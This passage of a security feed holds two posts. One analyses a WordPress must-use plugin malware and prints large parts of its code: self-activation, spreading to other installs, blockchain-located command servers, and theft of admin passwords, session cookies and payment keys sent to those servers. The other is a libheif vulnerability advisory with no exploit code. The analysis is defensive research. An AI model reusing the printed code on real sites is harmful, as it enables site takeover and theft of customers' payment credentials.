$table = '`' . $fhgzkfss6eygrbu8 . '`.`' . $prefix . 'options`';
$wpdb-&gt;query('START TRANSACTION');
$jyplgb2fvx6m = $wpdb-&gt;get_var("SELECT option_value FROM {$table} WHERE option_name = 'active_plugins' LIMIT 1 FOR UPDATE");
$j9k6v94v756tzvy = @unserialize($jyplgb2fvx6m);
$j9k6v94v756tzvy[] = $basename;
$c6crsj6d5osgm0 = serialize($j9k6v94v756tzvy);
$wpdb-&gt;query($wpdb-&gt;prepare("UPDATE {$table} SET option_value = %s WHERE option_name = 'active_plugins'", $c6crsj6d5osgm0));
$wpdb-&gt;query('COMMIT');
</pre>
<h3>Spreading to other WordPress installations</h3>
<p>The malware searches the filesystem for WordPress installations and writes a copy of itself into each accessible installation. It targets common web-server roots including <code>/home</code>, <code>/var/www</code>, <code>/var/www/vhosts</code>, <code>/var/www/html</code>, <code>/srv/www</code>, <code>/srv/users</code>, and <code>/usr/local/www</code>, as well as paths relative to its own location.</p>
<p>On a shared hosting environment where multiple sites share the same server, a single infection can spread silently across all of them.</p>
<pre class="brush: php; title: ; notranslate">
// run at most once every three days
if (get_transient('sc_spread_interval')) {
    return;
}
set_transient('sc_spread_interval', 1, 259200);

$self = @file_get_contents(__FILE__);   // read its own source

// $roots is built from hardcoded web-server paths
foreach ($roots as $root) {
    // try wp-content/mu-plugins first
    $dest = $root . '/wp-content/mu-plugins';
    if (!is_dir($dest)) {
        @mkdir($dest, 0755, true);
    }

    if (!@file_put_contents($dest . '/' . $name, $self)) { // $name is the malware's own filename
        // fall back to wp-content/plugins if mu-plugins fails
        $dest = $root . '/wp-content/plugins/' . $name;
        if (!is_dir($dest)) {
            @mkdir($dest, 0755, true);
        }
        @file_put_contents($dest . '/' . $name, $self);   // write a copy of itself
    }
    @touch($dest . '/' . $name, dw9_2yhlyjj8r4k_uq81());  // backdate the modification time
    @chmod($dest . '/' . $name, 0444);                     // lock it read-only
}
</pre>
<h2>Command and Control</h2>
<p>Many implants contain one or more hard-coded C2 domains or IP addresses. Once defenders identify it, they can block traffic to it, and the domain or hosting behind it can be reported and taken down.</p>
<p>This implant avoids that weakness by bootstrapping its command channel from the Ethereum blockchain to hide the location of the attacker’s servers, a technique known as EtherHiding. Rather than hard-code the address of a command server, it reads that information from a smart contract at runtime, so there is no fixed address to block.</p>
<h3>Ethereum-based smart contract</h3>
<p>The malware reaches the smart contracts through public Remote Procedure Call (RPC) gateways using a standard <code>eth_call</code> request, the same read-only call any application uses to query a contract.</p>
<p>It holds two hardcoded lists, a set of three contract addresses and a set of twenty-one public RPC gateways. For each attempt it selects one of each at random.</p>
<pre class="brush: php; title: ; notranslate">
$contracts = byvp8n383oyo22vc1l_();                 // three smart contract addresses
$endpoints = goau2s7k03sauui90();                   // twenty-one public RPC gateways
$contract  = $contracts[array_rand($contracts)];    // pick a contract at random
$url       = $endpoints[array_rand($endpoints)];    // pick a gateway at random
</pre>
<p>The request is a JSON-RPC <code>eth_call</code>, assembled from parts held in the string table.</p>
<pre class="brush: plain; title: ; notranslate">
{"jsonrpc":"2.0","id":3,"method":"eth_call","params":[{"data":"0x3bc5de30","to":"&lt;contract address&gt;"},"latest"]}
</pre>
<p>The <code>data</code> value <code>0x3bc5de30</code> is the function selector, the identifier of the contract method the malware calls. The <code>to</code> value is the contract being queried.</p>
<p>Because the command data lives on a public blockchain and can be reached through many independent gateways, there is no single server for a defender to block. If one gateway is unavailable, any of the others returns the same data, and the malware falls back to another contract if needed.</p>
<p>The contract returns a hex-encoded result, which the malware decodes and decrypts to recover a decryption key and a list of HTTP server addresses.</p>
<pre class="brush: php; title: ; notranslate">
// the decrypted blockchain response yields two values
$data['server_key'];   // a key used to encrypt and decrypt traffic with the servers
$data['urls'];         // the addresses of the real command servers
</pre>
<p>The blockchain’s role is only to point the malware to its current servers. This is what makes the channel resilient. The servers can be taken down and replaced, and the attacker simply updates the contract, so the next time the malware runs, it receives the new list.</p>
<h3>Encrypted exchange</h3>
<p>The malware then contacts each server in the list with a single request. The request serves two purposes, it uploads a report of stolen data in the request body, and receives the attacker’s instructions in the response. Both directions are encrypted with the <code>server_key</code> from the blockchain.</p>
<pre class="brush: php; title: ; notranslate">
foreach ($urls as $url) {
    // POST the encrypted report, read the encrypted reply
    $response = jvbt_m3y2u8ss9w($url, $encryptedReport, $headers, 10);
    $payload  = json_decode(trim(kqbyuahnajyvmjd35130q($response, $server_key)), true);
    if (is_array($payload)) {
        break;   // stop at the first server that answers
    }
}
</pre>
<p>The sender tries <code>wp_remote_post</code>, and falls back to a direct <code>cURL</code> request if it is unavailable. The response is decrypted with the same <code>server_key</code> and decoded into the payload the malware acts on.</p>
<pre class="brush: php; title: ; notranslate">
function jvbt_m3y2u8ss9w($url, $body, $headers, $timeout) {
    if (function_exists('wp_remote_post')) {
        $response = @wp_remote_post($url, array(
            'timeout'   =&gt; $timeout,
            'sslverify' =&gt; false,
            'headers'   =&gt; $headers,
            'body'      =&gt; $body,
        ));
        if (!is_wp_error($response) &amp;&amp;
            wp_remote_retrieve_response_code($response) === 200) {
            return wp_remote_retrieve_body($response);
        }
    }
    if (function_exists('curl_init')) {
        $ch = @curl_init($url);
        if ($ch === false) {
            return false;
        }
        @curl_setopt_array($ch, array(
            CURLOPT_POST            =&gt; true,
            CURLOPT_POSTFIELDS      =&gt; $body,
            CURLOPT_RETURNTRANSFER  =&gt; true,
            CURLOPT_TIMEOUT         =&gt; $timeout,
            CURLOPT_SSL_VERIFYPEER  =&gt; false,
            CURLOPT_SSL_VERIFYHOST  =&gt; false,
            CURLOPT_HTTPHEADER      =&gt; $headers,
        ));
        $result = @curl_exec($ch);
        if (@curl_errno($ch)) {
            @curl_close($ch);
            return false;
        }
        $code = (int) @curl_getinfo($ch, CURLINFO_HTTP_CODE);
        @curl_close($ch);
        if ($code === 200 &amp;&amp; $result !== false) {
            return $result;
        }
    }
}
</pre>
<p>The request body carries the data collected from the site and the response carries instructions that modify the malware or the site.</p>
<h3>Data exfiltration</h3>
<p>The report the malware uploads to each server is a structured summary of the site, its secrets, and the malware’s own version string and filename.</p>
<pre class="brush: php; title: ; notranslate">
$report = array(
    'domain'           =&gt; $domain,
    'pluginVersion'    =&gt; a7rn6y18yhlfjea(),  // the version string
    'plugin'           =&gt; basename(__FILE__, '.php'),   // the filename
    'root'             =&gt; $root,               // filesystem path
    'loginUrl'         =&gt; htcmmso1q879ci0kyj(),  // the wp-admin login URL
    'activatedPlugins' =&gt; $active,
    'muPlugins'        =&gt; $muPlugins,
    'admins'           =&gt; x5l7ohk3i20j63(),     // Rogue admin credentials and harvested admin passwords in plaintext
    'adminsCookies'    =&gt; i9c0lmgfm065jbipvz5a2(),  // forged sessions for each admin
    'woocommerce'      =&gt; efo_ap4b6014w6(),               // WooCommerce order data
    'apiKeys'          =&gt; cmok60d1b827y0twh(),            // payment and cloud credentials
);
</pre>
<p>The <code>apiKeys</code> field is the result of a dedicated search for payment infrastructure. The malware scans <code>wp-config.php</code>, any <code>.env</code> file, and <code>.git/config</code> for constants and variables matching a fixed set of providers including Stripe, Braintree, Authorize.Net, and AWS.</p>
<pre class="brush: php; title: ; notranslate">
// matches STRIPE, BRAINTREE, AUTHORIZE, AUTHNET, or AWS constants in wp-config.php
'#defines*(s*['"]([A-Z_]*(?:STRIPE|BRAINTREE|AUTHORIZE|AUTHNET|AWS)[A-Z_]*)['"]s*,s*['"](.+?)['"]s*)#'
</pre>
<p>It also reads the settings WooCommerce stores in the database for each payment gateway, collecting any field whose name contains a payment-related keyword.</p>
<pre class="brush: php; title: ; notranslate">
$gateways = array(
    'woocommerce_stripe_settings',
    'woocommerce_braintree_settings',
    'woocommerce_authorize_net_cim_credit_card_settings',
);
foreach ($gateways as $option) {
    $settings = get_option($option, array());
    if (!is_array($settings)) {
        continue;
    }
    foreach ($settings as $field =&gt; $value) {
        if (!is_string($value) || $value === "") {
            continue;
        }
        // collect any field whose name contains key, secret, token, login_id, or transaction_key
        if (stripos($field, 'key') !== false || stripos($field, 'secret') !== false
            || stripos($field, 'token') !== false || stripos($field, 'login_id') !== false
            || stripos($field, 'transaction_key') !== false) {
            $collected[strtolower($option) . '_' . $field] = $value;
        }
    }
}
</pre>
<p>Taken together, the report gives the attacker the site’s payment credentials, its customer order data, and immediate administrator access.</p>
<h3>Remote site modification</h3>
<p>The response payload returned from the server carries four keys, each driving a separate action against the site. All four arrive through the command channel, so the attacker can change any of them at any time.</p>
<h4>Updating the malware</h4>
<p>The <code>plugin</code> key lets the attacker replace the malware with a new version. The value is base64-encoded PHP, and after checking it begins with <code>&lt;?php</code>, the malware writes it over its own file and stores a copy in the <code>src</code> option, the same option its file-restore mechanism reads from.</p>
<pre class="brush: php; title: ; notranslate">
$code = base64_decode($GLOBALS['payload']['plugin']);
if ($code &amp;&amp; strlen($code) &gt;= 500 &amp;&amp; strpos($code, '&lt;?php') === 0) {
    update_option('src', $code, 'no');                 // store the new version for self-restore
    $tmp = tempnam(sys_get_temp_dir(), 'sc_');          // stage in a temp file first
    if (file_put_contents($tmp, $code) === strlen($code)) {
        chmod(__FILE__, 0644);                          // make its own file writable
        if (!@rename($tmp, __FILE__)) {                 // atomically replace itself...
            @copy($tmp, __FILE__);                       // ...or copy as a fallback
        }
    } else {
        unlink($tmp);                                    // integrity check failed, discard
    }
}
</pre>
<h4>Removing other plugins</h4>
<p>Using regular-expression rules delivered through the command channel, the malware scans installed plugins and removes any plugin whose source matches a rule.</p>
<p>The logic used for targeting is driven by a set of rules delivered through the command channel. The malware reads its stored payload and extracts a <code>pluginRules</code> entry into a global variable.</p>
<pre class="brush: php; title: ; notranslate">
// load the stored command payload, then pull the plugin rules out of it
$payload = function_exists('get_transient') ? get_transient(ntr_b_9zdbhm1y4mo_hc_i()) : false;
if (!is_array($payload)) {
    $payload = get_option('sc_payload_persistent', false);
}
if (is_array($payload) &amp;&amp; isset($payload['pluginRules']) &amp;&amp; is_array($payload['pluginRules'])) {
    $GLOBALS['sc_plugin_rules'] = $payload['pluginRules'];   // the rules, cached from the command channel
}
</pre>
<p>Each rule is a regular expression. To decide whether a plugin is a target, the malware reads that plugin’s source files and tests them against every rule.</p>
<pre class="brush: php; title: ; notranslate">
function t_548eeg11py5x8($file, $rules) {
    $contents = @file_get_contents($file, false, null, 0, (524240 + 48));   // read the file's contents
    if (!$contents) {
        return false;
    }
    foreach ($rules as $rule) {
        if (!is_string($rule) || !$rule) {
            continue;
        }
        try {
            $matched = @preg_match($rule, $contents);   // test the file against each regex rule
        } catch (Throwable $e) {
            continue;
        }
        if ($matched) {
            return true;   // a match marks the plugin for removal
        }
    }
    return false;
}
</pre>
<p>This runs across every installed plugin. For each one, the malware collects its <code>.php</code>, <code>.phtml</code>, <code>.html</code>, <code>.inc</code>, and <code>.js</code> files and passes them through the rules above. Any plugin with a file matching a rule is then deactivated and deleted using the WordPress <code>deactivate_plugins</code> and <code>delete_plugins</code> functions.</p>
<pre class="brush: php; title: ; notranslate">
function k4creghzjmqogojz7yuq6($plugin_basename) {
    if (strpos($plugin_basename, '..') !== false) {
        return false;                                    // reject paths outside the plugin dir
    }
    if ($plugin_basename === z3f7atq0yss_u_()) {
        return false;                                    // skip its own file
    }
    if (function_exists('deactivate_plugins') &amp;&amp; is_plugin_active($plugin_basename)) {
        deactivate_plugins(array($plugin_basename), true);
    }
    $dir = defined('WP_PLUGIN_DIR') ? WP_PLUGIN_DIR . '/' . dirname($plugin_basename) : "";
    if ($dir &amp;&amp; is_dir($dir)) {
        qo_j7kfxrq2cnfv0v_jdto($dir);                    // recursively delete the plugin's folder
    }
    delete_plugins(array($plugin_basename));             // fallback: WordPress's own delete
    return true;
}
</pre>
<h4>Stripping content from plugin files</h4>
<p>The <code>injectRules</code> payload has a set of rules applied to the files of active plugins to delete matching text.</p>
<p>The malware first builds its list of target files from the <code>active_plugins</code> option, taking the main file of each active plugin under <code>WP_PLUGIN_DIR</code>.</p>
<pre class="brush: php; title: ; notranslate">
function lolulowt6mge5d() {
    $files = array();
    $active = (array) get_option('active_plugins', array());   // the site's active plugins
    foreach ($active as $basename) {
        $files[] = WP_PLUGIN_DIR . '/' . $basename;            // the plugin's main file
    }
    return $files;
}
</pre>
<p>For each file, it reads the contents and applies every rule as a regular-expression. If a rule matches, the matching text is replaced with an empty string. When a file has changed, it is written back to disk.</p>
<pre class="brush: php; title: ; notranslate">
foreach ($files as $file) {
    if (!@is_file($file) || !@is_writable($file)) {
        continue;
    }
    $contents = @file_get_contents($file, false, null, 0, (0x56c41 + 0x293bf));   // read up to ~512KB
    $changed = false;
    foreach ($rules as $rule) {
        $result = @preg_replace($rule, "", $contents);   // replace matches with an empty string
        if ($result !== null &amp;&amp; $result !== $contents) {
            $contents = $result;
            $changed = true;
        }
    }
    if ($changed) {
        @file_put_contents($file, $contents);            // write the edited file back
    }
}
</pre>
<h4>Injecting JavaScript</h4>
<p>The <code>js</code> payload is a block of JavaScript served to visitors. The malware registers a handler on <code>wp_footer</code> at priority <code>999</code>.</p>
<pre class="brush: php; title: ; notranslate">
add_action('wp_footer', 'pw1xg0pjavy1n_s793hvxg', 999);
</pre>
<p>The handler reads the JavaScript from the cached payload and echoes it into a <code>&lt;script&gt;</code> tag so it runs in every visitor’s browser.</p>
<p>The capability of the malware is flexible by design. All four behaviours are driven by rules and content supplied through the command channel. The plugin patterns, the content rules, and the injected JavaScript all come from the attacker and can be changed at any time. The code shows what the malware is capable of, not what it has been instructed to do.</p>
<h2>Indicators of Compromise</h2>
<h3>Suspicious Must Use plugin file</h3>
<p>Look for a must-use plugin in <code>wp-content/mu-plugins</code> whose plugin name, author, and repository link do not correspond to any known public plugin. The samples analysed used a custom string-substitution cipher to hide hook names, option keys, file paths, and SQL statements from static analysis. Each sample analysed used different plugin metadata including name, author, and repository link, and the file contents differ between samples, so metadata and file hashes are both unreliable indicators on their own. Site owners should check for unrecognized, heavily obfuscated must-use plugins in <code>wp-content/mu-plugins</code> and the indicators below.</p>
<h3>Rogue administrator account</h3>
<p>Check the <code>wp_users</code> table using a database administration tool such as phpMyAdmin for an unauthorized administrator account whose username follows the pattern of a fixed prefix followed by six random characters.</p>
<ul>
<li><code>admin_xxxxxx</code></li>
<li><code>adm_xxxxxx</code></li>
<li><code>administrator_xxxxxx</code></li>
<li><code>backup_xxxxxx</code></li>
</ul>
<h3>Database options</h3>
<p>The presence of any of the following options in the <code>wp_options</code> table:</p>
<ul>
<li><code>src</code> — contains the malware’s PHP source code</li>
<li><code>bu</code> — contains a username</li>
<li><code>bp</code> — contains a password</li>
<li><code>ic</code> — contains usernames and plaintext passwords captured at login</li>
</ul>
<h3>Custom WordPress cron schedules</h3>
<p>The plugin uses its own event scheduler. Custom <code>cron_schedules</code> entries with unfamiliar names such as <code>jf_7xc5bj9trbgji</code> should be treated with suspicion.</p>
<h2>Conclusion</h2>
<p>In this post we analysed a sophisticated must-use plugin malware with a resilient two-tier command channel, several independent persistence mechanisms, and a focused interest in payment infrastructure. What makes it notable is the combination, the blockchain bootstrap makes the command channel difficult to take down, while the persistence mechanisms are designed to defeat the most common cleanup steps a site owner would take.</p>
<p>A malware detection signature was developed and released after undergoing our Q&amp;A process on June 23rd 2026. All <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> customers received this signature immediately. Users of the free versions of Wordfence received the same signatures after the standard 30-day delay.</p>
<p>If your site has been compromised, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a> and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> offer hands-on incident response, with Wordfence Response providing 24/7 availability and a one-hour response time.</p>
<div>
<p><strong>Need Immediate Help With Malware Removal?</strong></p>
<hr>
<p>If you’re experiencing issues with malware or a hacked website and need immediate support, Wordfence offers expert site cleanings in our <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener"><strong>Care</strong></a> and <strong><a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a></strong> plans. Both plans come with a thorough malware investigation, malware cleanup, and post-incident search engine security cleanup.</p>
<p>With <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener"><strong>Wordfence Care</strong></a>, you’ll receive expert support during business hours. <strong><a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a></strong> offers a 1-hour response time and incident support 24/7/365. Both of these options also include a site audit from our professional team of WordPress security experts.</p>
<p><a href="https://www.wordfence.com/products/pricing/" target="_blank" rel="noopener">Get Immediate Help with Malware Removal</a></p>
</div>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/inside-a-malicious-stealthy-wordpress-must-use-plugin/" target="_blank" rel="noopener">Inside a Malicious, Stealthy WordPress Must Use Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Argus Discovers Critical Vulnerability in libheif, the Library That Opens iPhone Photos on Your Server</title>
		<link>https://swiftupdates.ca/wordfence-argus-discovers-critical-vulnerability-in-libheif-the-library-that-opens-iphone-photos-on-your-server/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Fri, 18 Sep 2026 19:55:33 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-argus-discovers-critical-vulnerability-in-libheif-the-library-that-opens-iphone-photos-on-your-server/</guid>

					<description><![CDATA[On September 1, 2026, the libheif project released version 1.23.3, closing a critical heap buffer overflow that the Wordfence Threat Intelligence team, using Wordfence Argus, discovered and reported four days earlier. The libheif maintainer, Dirk Farin, gave it a score of 9.8 out of 10 on the CVSS scale, with the release notes singling it [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On September 1, 2026, the <a href="https://github.com/strukturag/libheif" target="_blank" rel="noopener">libheif</a> project released version <a href="https://github.com/strukturag/libheif/releases/tag/v1.23.3" target="_blank" rel="noopener">1.23.3</a>, closing a critical heap buffer overflow that the Wordfence Threat Intelligence team, using <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>, discovered and reported four days earlier. The libheif maintainer, <a href="https://github.com/farindk" target="_blank" rel="noopener">Dirk Farin</a>, gave it a score of <strong>9.8 out of 10</strong> on the CVSS scale, with the release notes singling it out: <em>“One of the fixed issues is rated critical, so all users are strongly advised to upgrade.”</em> The bug lets a crafted HEIC image write attacker-chosen data past the end of a memory buffer. On a vulnerable server, that can lead to reading files the image-processing worker can access or running code with its permissions.</p>
<p>If you run a WordPress site, there isn’t a WordPress plugin to update for the usual image-processing path. libheif is a system library, so most site owners will get the fix through their operating system or hosting provider. Containerized sites need to be rebuilt and redeployed from an updated base image. Whether you’re exposed depends on both the libheif version and how it was built. We tested nine real configurations on September 5, and <strong>the official WordPress Docker image we tested was one of the vulnerable ones.</strong></p>
<div>
<h2>Key Takeaways</h2>
<ul>
<li><strong><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a> found a <a href="https://github.com/strukturag/libheif/security/advisories/GHSA-x8r2-mggj-j6wr" target="_blank" rel="noopener">critical CVSS 9.8 vulnerability</a> in <a href="https://github.com/strukturag/libheif" target="_blank" rel="noopener">libheif</a></strong>, a library many servers use to process HEIC images.</li>
<li><strong><a href="https://github.com/strukturag/libheif/releases/tag/v1.23.2" target="_blank" rel="noopener">libheif 1.23.2</a> is still vulnerable.</strong> The fix arrived in <a href="https://github.com/strukturag/libheif/releases/tag/v1.23.3" target="_blank" rel="noopener">1.23.3</a>; <a href="https://github.com/strukturag/libheif/releases/tag/v1.23.4" target="_blank" rel="noopener">1.23.4</a> is the current upstream security release. Your operating system may use a lower version number with the fix backported.</li>
<li><strong>We demonstrated <a href="https://github.com/strukturag/libheif/security/advisories/GHSA-x8r2-mggj-j6wr" target="_blank" rel="noopener">protected-file disclosure and code execution</a></strong> on one exact WordPress deployment. Exploitation is target-specific, but <a href="https://heif-heist.com/" target="_blank" rel="noopener"><strong>HEIF Heist</strong></a> shows that adapting image exploits to real systems is practical.</li>
<li><strong>This is not a WordPress-only vulnerability.</strong> Any application or service that uses an <a href="https://github.com/strukturag/libheif/security/advisories/GHSA-x8r2-mggj-j6wr" target="_blank" rel="noopener">affected libheif build</a> to decode untrusted HEIC or HEIF files may be exposed, including image viewers, media servers, document pipelines, and thumbnail services.</li>
<li><strong>The <a href="https://hub.docker.com/_/wordpress" target="_blank" rel="noopener">official WordPress Docker image</a> we tested was exposed.</strong></li>
<li><strong>There is no WordPress plugin to update.</strong> Install the fixed system package, restart affected services, and rebuild containers from an updated base image.</li>
<li><strong>Wordfence Argus discovered the vulnerability during a WordPress 7.1 assessment led and validated by <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a>.</strong> libheif maintainer <a href="https://github.com/farindk" target="_blank" rel="noopener">Dirk Farin</a> released the fix four days after our report.</li>
</ul>
</div>
<h2>Wait, what’s libheif, and what does it have to do with WordPress?</h2>
<p>If you own an iPhone, you’ve been generating <a href="https://en.wikipedia.org/wiki/High_Efficiency_Image_File_Format" target="_blank" rel="noopener">HEIC</a> files since 2017. Apple made it the default photo format in iOS 11 because it stores a better-looking picture in about half the space of a JPEG. Most people have never heard of it, and have uploaded thousands of these files without thinking much about it.</p>
<p>HEIC is a container. Think of it as a box with a packing list that says what’s inside and how it was encoded. Opening that box is surprisingly involved, so almost nobody writes their own code to do it. Instead, most settle on one library, <strong>libheif</strong>, which is a popular piece of software that actually reads HEIC images for much of the Linux ecosystem.</p>
<p>WordPress does not decode images itself. When someone uploads a photo, WordPress needs to read it to build thumbnails and pull out metadata, so it hands the file to an image editor. On affected servers, the PHP <a href="https://www.php.net/manual/en/book.imagick.php" target="_blank" rel="noopener">Imagick</a> extension calls <a href="https://imagemagick.org/" target="_blank" rel="noopener">ImageMagick</a>, which recognizes HEIF and passes the file down to libheif. That places a C++ library in the PHP image-processing worker, parsing bytes that arrived from the Internet with that worker’s permissions.</p>
<p>The result is that a photo format built for phone cameras gets parsed by a library most site owners have never installed on purpose and couldn’t name. The same library also sits under desktop image viewers, photo galleries, self-hosted media servers and thumbnail generators, so if any of those open HEIC files from other people, this applies there too.</p>
<h2>This is a critical CVSS 9.8 vulnerability. Should I be worried?</h2>
<p>If your server processes HEIC or HEIF files from people you do not fully trust, this deserves prompt action.</p>
<p>A CVSS score of 9.8 is close to the maximum. In plain English, it says that when an application exposes this library to untrusted images over the network without requiring a login, the worst-case result is a full server compromise. It does not mean every WordPress site lets strangers upload HEIC files. Our demonstration against a clean WordPress installation used an ordinary Author account. Dirk Farin, libheif’s maintainer, assigned the score.</p>
<p>The score also doesn’t tell you how much work sits between crashing a server and taking it over, or whether one malicious file will work everywhere, so we tested that too.</p>
<p>Modern systems are designed to make memory-corruption bugs miserable to exploit. <strong>ASLR</strong> (Address Space Layout Randomization) shuffles where code and data end up in memory. <strong>RELRO</strong> (Relocation Read-Only) makes useful internal tables read-only. These defenses are one reason a heap overflow usually produces a crash instead of a compromised server, but this bug can go further.</p>
<p>We proved that on one specific WordPress setup running Debian and glibc, where the flaw let us read a protected file and execute code. A narrower test that copied the uploaded image into another location worked in 29 of 30 attempts against an Apache server that was already running and reusing worker processes. That is strong evidence of real impact, but it is not a universal exploit. Our payload still depended on the exact libheif build, how the server managed memory, and requests reaching a worker that had the right state.</p>
<p>That makes exploitation more work, not impossible. An attacker may need a different file for a different build or environment. If hundreds or thousands of sites use the same hosting image, however, the work done for one may carry over to the others.</p>
<p>On a standard WordPress site, <a href="https://wordpress.org/documentation/article/roles-and-capabilities/#author" target="_blank" rel="noopener">Author is the first role allowed to upload media</a>. We did not test a lower-privileged route. A plugin or custom application that lets visitors or subscribers upload HEIC files could change the picture considerably if it sends those files through the same vulnerable path.</p>
<p>For now, the most believable attack is aimed at a known target or a group of servers built alike. One unchanged image is unlikely to compromise every WordPress server on the Internet, but a capable attacker can fingerprint a target and adapt the exploit. High-value targets and hosting fleets built from a shared image deserve particular attention.</p>
<h2>How this relates to HEIF Heist</h2>
<p>At first, needing to tailor an exploit to each environment may sound reassuring. <a href="https://heif-heist.com/" target="_blank" rel="noopener">HEIF Heist</a> is a good reason not to lean too heavily on that comfort.</p>
<p>Hacktron’s researchers took several other libheif vulnerabilities and turned them into working attacks against real image-processing services. <a href="https://github.com/discourse/discourse/security/advisories/GHSA-vhm9-85gw-x335" target="_blank" rel="noopener">Discourse confirmed code execution</a> through an affected image upload, and <a href="https://vercel.com/changelog/nextjs-august-2026-security-release" target="_blank" rel="noopener">Vercel confirmed unauthenticated code execution</a> when affected Next.js applications processed a crafted AVIF image.</p>
<p><em>The Wordfence Argus finding is a newer, separate bug with a different root cause, and it was fixed later.</em> <a href="https://github.com/strukturag/libheif/releases/tag/v1.23.2" target="_blank" rel="noopener">libheif 1.23.2 addressed two critical vulnerabilities</a> featured in HEIF Heist, but ours remained until libheif 1.23.3. The bugs work differently under the hood, but to a site owner the stakes are familiar: a file upload reaches a vulnerable image library, and memory corruption can become file disclosure or code execution.</p>
<p><a href="https://www.hacktron.ai/blog/hacking-openai" target="_blank" rel="noopener">Hacktron says</a> adapting its exploits to a new target generally took about one or two days. That does not create one malicious image that works everywhere, but it does show that “needs to be tailored” is a speed bump rather than a safety control. If your application accepts HEIC or HEIF files from people you do not trust, patching should be the priority.</p>
<h2>Is my WordPress site affected?</h2>
<p><strong>Install your operating system or hosting provider’s libheif security update as soon as it is available.</strong> If you install libheif directly, use at least 1.23.3. Version 1.23.4 is the current upstream security release and includes more security fixes. Restart PHP and the affected web services afterward so they stop using the old library. For containers, rebuild and redeploy from an updated base image rather than simply restarting the old container.</p>
<p><strong>The usual WordPress image-processing path is exposed only if all of these are true at once:</strong></p>
<ol>
<li>Your server has the PHP Imagick extension, since WordPress’s other image editor cannot read HEIC at all</li>
<li>Your ImageMagick was packaged with HEIF support</li>
<li>Your libheif version falls between 1.18.0 and 1.23.2</li>
<li>That libheif was compiled with its uncompressed codec enabled</li>
</ol>
<p>That last bit means <strong>you can’t rely on the version number alone to determine if you’re vulnerable.</strong> Package contents change, so this table records what we found on September 5. We tested nine real configurations by asking each one to decode a valid uncompressed HEIF file:</p>
<div>
<table>
<thead>
<tr>
<th scope="col">Platform</th>
<th scope="col">libheif</th>
<th scope="col">Vulnerable</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Official <code>wordpress</code> Docker image</strong></td>
<td>1.19.8</td>
<td><strong>Yes</strong></td>
</tr>
<tr>
<td><strong>Debian 13 trixie</strong> (current stable)</td>
<td>1.19.8</td>
<td><strong>Yes</strong></td>
</tr>
<tr>
<td><strong>Ubuntu 26.04</strong></td>
<td>1.21.2</td>
<td><strong>Yes</strong></td>
</tr>
<tr>
<td><strong>Fedora 44</strong></td>
<td>1.21.2</td>
<td><strong>Yes</strong></td>
</tr>
<tr>
<td>Ubuntu 24.04 LTS</td>
<td>1.17.6</td>
<td><span>No</span></td>
</tr>
<tr>
<td>Debian 12 bookworm</td>
<td>1.15.1</td>
<td><span>No</span></td>
</tr>
<tr>
<td>Alpine 3.22</td>
<td>1.19.8</td>
<td><span>No</span></td>
</tr>
<tr>
<td>Alpine 3.23</td>
<td>1.23.0</td>
<td><span>No</span></td>
</tr>
<tr>
<td>AlmaLinux 10</td>
<td>1.17.6</td>
<td><span>No</span></td>
</tr>
</tbody>
</table>
</div>
<p>Look at Debian 13 and Alpine 3.22. Both ship libheif <strong>1.19.8</strong>, the same upstream release. One is vulnerable, one is not, because one enables the uncompressed codec at build time and the other does not.</p>
<p><strong>The official WordPress Docker image we tested was exposed out of the box.</strong> It was built on Debian 13, shipped the Imagick extension, reported HEIC support, and its libheif decoded the vulnerable format. Every condition was satisfied with no action by the operator. If you use the official image, pull an updated base, rebuild your image without relying on a cached layer, and redeploy it.</p>
<p><strong>To check your own site</strong>, go to <em>Tools → Site Health → Info → Media Handling</em>, which lists the file formats ImageMagick supports. If HEIC is not listed, this particular WordPress Imagick path is not exposed. Other software on the server may still use libheif.</p>
<p><strong>If you can’t patch yet</strong>, stop accepting these files. Removing <a href="https://developer.wordpress.org/reference/functions/wp_get_mime_types/" target="_blank" rel="noopener">all four HEIF types WordPress accepts</a> (<code>heic</code>, <code>heif</code>, <code>heics</code>, and <code>heifs</code>) from your allowed upload types means the file is rejected before it reaches the vulnerable library. Disabling PHP execution in your uploads directory is also a good idea (in general).</p>
<p><strong>Is this likely to hit an average WordPress site?</strong> A single generic exploit is unlikely to work across every WordPress server. That is useful context, but it is not a reason to delay the update. HEIF Heist showed that tailoring an exploit to a target is practical. The risk is highest for sites that accept untrusted HEIC files, high-value targets, and hosting fleets that reuse the same image or build.</p>
<p>Managed hosting customers can’t check most of this themselves. It’s a reasonable thing to ask your host if the libheif version of your site host is within the vulnerable range and is built with the uncompressed codec enabled.</p>
<h2>What this means for everyone else using libheif</h2>
<p>Nothing about this vulnerability is specific to WordPress. WordPress is one delivery route among many, and the same question applies anywhere where libheif is used: does this software decode HEIC files that came from somebody else?</p>
<p>If you process files from untrusted sources, whether that is a photo-sharing service, document pipeline, chat application generating previews, or self-hosted media server, move this toward the top of your patch list. Check both the installed libheif version and whether it was built with the uncompressed codec enabled. Install your vendor’s fixed package, isolate or sandbox image processing where possible, and disable HEIF support if you do not need it.</p>
